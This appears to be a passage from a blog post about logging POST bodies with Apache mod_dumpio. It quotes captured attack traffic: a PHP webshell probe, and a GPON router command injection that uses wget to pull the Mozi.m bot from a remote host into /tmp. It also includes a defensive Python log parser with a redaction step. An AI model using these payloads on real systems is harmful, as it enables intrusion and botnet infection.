[Fri Nov 20 01:46:12.877188 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): Cache-Control: no-cache\r\n
[Fri Nov 20 01:46:12.877192 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 01:46:12.877215 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 2 bytes
[Fri Nov 20 01:46:12.877219 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): \r\n
[Fri Nov 20 01:46:12.877361 2020] [php7:error] [pid 21918] [client 132.232.xxx.xxx:45533] script '/var/www/html/wuwu11.php' not found or unable to stat
[Fri Nov 20 01:46:12.877379 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(140): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_in [readbytes-blocking] 23 readbytes
[Fri Nov 20 01:46:12.877385 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): 23 bytes
[Fri Nov 20 01:46:12.877390 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_in (data-HEAP): h=die(@md5(S3pt3mb3r));
[Fri Nov 20 01:46:12.877405 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(164): [client 132.232.xxx.xxx:45533] mod_dumpio: dumpio_out
[Fri Nov 20 01:46:12.877409 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(63): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_out (data-HEAP): 200 bytes
[Fri Nov 20 01:46:12.877414 2020] [dumpio:trace7] [pid 21918] mod_dumpio.c(103): [client 132.232.xxx.xxx:45533] mod_dumpio:  dumpio_out (data-HEAP): HTTP/1.1 404 Not Found\r\nDate: Fri, 20 Nov 2020 01:46:12 GMT\r\nServer: Apache\r\nContent-Length: 196\r\nKeep-Alive: timeout=5, max=82\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n

Traffic attempting remote code execution by exploiting a vulnerability in GPON routers. It tries to download a file named Mozi.m from a remote server and save it as /tmp/gpon80. Mozi.m is probably a bot.


41.226.xxx.xxx - - [20/Nov/2020:05:07:22 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 397 "-" "Hello, World"

[Fri Nov 20 05:07:22.293850 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): POST /GponForm/diag_Form?images/ HTTP/1.1\r\n
[Fri Nov 20 05:07:22.293861 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293868 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 20 bytes
[Fri Nov 20 05:07:22.293872 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): Host: 127.0.0.1:80\r\n
[Fri Nov 20 05:07:22.293877 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293883 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 24 bytes
[Fri Nov 20 05:07:22.293887 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): Connection: keep-alive\r\n
[Fri Nov 20 05:07:22.293891 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293913 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 32 bytes
[Fri Nov 20 05:07:22.293916 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): Accept-Encoding: gzip, deflate\r\n
[Fri Nov 20 05:07:22.293919 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293922 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 13 bytes
[Fri Nov 20 05:07:22.293925 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): Accept: */*\r\n
[Fri Nov 20 05:07:22.293928 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293931 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 26 bytes
[Fri Nov 20 05:07:22.293933 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): User-Agent: Hello, World\r\n
[Fri Nov 20 05:07:22.293936 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293939 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 21 bytes
[Fri Nov 20 05:07:22.293942 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): Content-Length: 118\r\n
[Fri Nov 20 05:07:22.293945 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Fri Nov 20 05:07:22.293948 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 2 bytes
[Fri Nov 20 05:07:22.293950 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): \r\n
[Fri Nov 20 05:07:22.294089 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(140): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_in [readbytes-blocking] 118 readbytes
[Fri Nov 20 05:07:22.294095 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): 118 bytes
[Fri Nov 20 05:07:22.294098 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_in (data-HEAP): XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://41.226.xxx.xxx:57757/Mozi.m+-O+->/tmp/gpon80;
[Fri Nov 20 05:07:22.294115 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(164): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_out
[Fri Nov 20 05:07:22.294118 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_out (data-HEAP): 201 bytes
[Fri Nov 20 05:07:22.294121 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_out (data-HEAP): HTTP/1.1 404 Not Found\r\nDate: Fri, 20 Nov 2020 05:07:22 GMT\r\nServer: Apache\r\nContent-Length: 196\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n
[Fri Nov 20 05:07:22.294126 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(164): [client 41.226.xxx.xxx:34500] mod_dumpio: dumpio_out
[Fri Nov 20 05:07:22.294129 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(63): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_out (data-HEAP): 196 bytes
[Fri Nov 20 05:07:22.294131 2020] [dumpio:trace7] [pid 24998] mod_dumpio.c(103): [client 41.226.xxx.xxx:34500] mod_dumpio:  dumpio_out (data-HEAP): <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n</body></html>\n

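Incidentally, the contents of legitimate POST traffic are also written to error.log. The following is legitimate traffic related to the WordPress popular posts plugin.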


160.239.xxx.xxx - - [18/Nov/2020:23:41:21 +0000] "POST /index.php?rest_route=/wordpress-popular-posts/v1/popular-posts HTTP/1.1" 201 778 "https://mymanfile.com/?p=1246" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"

[Wed Nov 18 23:41:21.313224 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): POST /index.php?rest_route=/wordpress-popular-posts/v1/popular-posts HTTP/1.1\r\n
[Wed Nov 18 23:41:21.313256 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313260 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 24 bytes
[Wed Nov 18 23:41:21.313263 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Connection: keep-alive\r\n
[Wed Nov 18 23:41:21.313266 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313269 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 21 bytes
[Wed Nov 18 23:41:21.313272 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Host: mymanfile.com\r\n
[Wed Nov 18 23:41:21.313276 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313279 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 129 bytes
[Wed Nov 18 23:41:21.313281 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\r\n
[Wed Nov 18 23:41:21.313285 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313288 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 34 bytes
[Wed Nov 18 23:41:21.313290 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): X-Requested-With: XMLHttpRequest\r\n
[Wed Nov 18 23:41:21.313293 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313296 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 49 bytes
[Wed Nov 18 23:41:21.313299 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Content-type: application/x-www-form-urlencoded\r\n
[Wed Nov 18 23:41:21.313302 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313305 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 13 bytes
[Wed Nov 18 23:41:21.313307 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Accept: */*\r\n
[Wed Nov 18 23:41:21.313310 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313313 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 30 bytes
[Wed Nov 18 23:41:21.313316 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Origin: https://mymanfile.com\r\n
[Wed Nov 18 23:41:21.313319 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313321 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 39 bytes
[Wed Nov 18 23:41:21.313324 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Referer: https://mymanfile.com/?p=1246\r\n
[Wed Nov 18 23:41:21.313331 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313334 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 23 bytes
[Wed Nov 18 23:41:21.313336 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Accept-Encoding: gzip\r\n
[Wed Nov 18 23:41:21.313339 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313342 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 42 bytes
[Wed Nov 18 23:41:21.313345 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Accept-Language: ja,en-US;q=0.9,en;q=0.8\r\n
[Wed Nov 18 23:41:21.313348 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313350 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 20 bytes
[Wed Nov 18 23:41:21.313353 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Content-Length: 60\r\n
[Wed Nov 18 23:41:21.313356 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313359 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 18 bytes
[Wed Nov 18 23:41:21.313361 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): X-IMForwards: 20\r\n
[Wed Nov 18 23:41:21.313364 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313367 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 58 bytes
[Wed Nov 18 23:41:21.313370 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): Via: 1.1 proxy04.soliton.co.jp:80 (Cisco-WSA/11.8.1-023)\r\n
[Wed Nov 18 23:41:21.313373 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [getline-blocking] 0 readbytes
[Wed Nov 18 23:41:21.313375 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 2 bytes
[Wed Nov 18 23:41:21.313378 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): \r\n
[Wed Nov 18 23:41:21.313507 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(140): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_in [readbytes-blocking] 60 readbytes
[Wed Nov 18 23:41:21.313513 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): 60 bytes
[Wed Nov 18 23:41:21.313516 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_in (data-HEAP): _wpnonce=de1121c8e8&wpp_id=1246&sampling=0&sampling_rate=100
[Wed Nov 18 23:41:21.334500 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(164): [client 160.239.xxx.xxx:27732] mod_dumpio: dumpio_out
[Wed Nov 18 23:41:21.334521 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(63): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_out (data-HEAP): 723 bytes
[Wed Nov 18 23:41:21.334525 2020] [dumpio:trace7] [pid 11112] mod_dumpio.c(103): [client 160.239.xxx.xxx:27732] mod_dumpio:  dumpio_out (data-HEAP): HTTP/1.1 201 Created\r\nDate: Wed, 18 Nov 2020 23:41:21 GMT\r\nServer: Apache\r\nX-Robots-Tag: noindex\r\nLink: <https://mymanfile.com/index.php?rest_route=/>; rel="https://api.w.org/"\r\nX-Content-Type-Options: nosniff\r\nAccess-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link\r\nAccess-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type\r\nX-WP-Nonce: de1121c8e8\r\nAllow: GET, POST\r\nAccess-Control-Allow-Origin: https://mymanfile.com\r\nAccess-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE\r\nAccess-Control-Allow-Credentials: true\r\nVary: Origin\r\nContent-Length: 55\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/json; charset=UTF-8\r\n\r\n
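
Dumps like the ones above are hard to read line by line, and they write every submitted form field, such as the `_wpnonce` value shown here, into error.log in clear text. The following added example (not part of the original post) rebuilds each request line and POST body from `dumpio_in` lines and masks sensitive fields before the result is stored or shared; the sample log, the `SENSITIVE` field list and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlencode

LINE = re.compile(r"\[pid (\d+)\].*?\[client ([^\]]+)\] mod_dumpio:\s+dumpio_in \(data-\w+\): (.*)$")
COUNT = re.compile(r"(\d+) bytes")
SENSITIVE = {"pwd", "password", "_wpnonce"}  # assumed field names; extend per application

def parse_requests(log_text):
    """Rebuild (request line, body) per (pid, client) connection from dumpio_in lines."""
    conns, done = {}, []
    for raw in log_text.splitlines():
        m = LINE.search(raw)
        if not m:
            continue  # getline/readbytes markers, dumpio_out and unrelated lines
        key, data = m.group(1, 2), m.group(3)
        count = COUNT.fullmatch(data)
        st = conns.get(key)
        if st and st["in_body"] and st["need"] <= 0 and count:
            done.append(conns.pop(key))  # body complete, a new request begins
        st = conns.setdefault(key, {"line": "", "body": "", "need": 0, "in_body": False, "counted": False})
        if count and not st["counted"]:  # "N bytes" announces the next data line
            st["counted"] = True
            st["need"] -= int(count.group(1)) if st["in_body"] else 0
            continue
        st["counted"] = False
        text = data[:-4] if data.endswith(r"\r\n") else data  # CRLF is logged as literal \r\n
        if st["in_body"]:
            st["body"] += data
        elif not st["line"]:
            st["line"] = text
        elif text == "":
            st["in_body"] = True  # blank line ends the headers
        elif text.lower().startswith("content-length:"):
            st["need"] = int(text.split(":", 1)[1])
    return [(s["line"], s["body"]) for s in done + list(conns.values()) if s["line"]]

def redact(body):
    """Mask sensitive form-field values before a body is stored or shared."""
    pairs = parse_qsl(body, keep_blank_values=True)
    return urlencode([(k, "REDACTED" if k.lower() in SENSITIVE else v) for k, v in pairs])

# Constructed sample (not from the page's log): one keep-alive connection, two requests.
_P = "[Wed Nov 18 16:18:49.182699 2020] [dumpio:trace7] [pid 11073] mod_dumpio.c(103): [client 192.0.2.10:35438] mod_dumpio:  dumpio_in (data-HEAP): "
SAMPLE = "\n".join(_P + d for d in [
    "29 bytes", r"POST /wp-login.php HTTP/1.1\r\n", "20 bytes", r"Content-Length: 29\r\n", "2 bytes", r"\r\n",
    "29 bytes", "log=admin&pwd=example-secret1", "23 bytes", r"GET /?p=1246 HTTP/1.1\r\n", "2 bytes", r"\r\n"])

if __name__ == "__main__":
    print([(line, redact(body)) for line, body in parse_requests(SAMPLE)])
```

The parser uses the `N bytes` lines to count down `Content-Length`, so a second request on the same keep-alive connection is not appended to the previous body.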

I had been looking at access logs less often lately, but this might make browsing the logs a little more fun again.
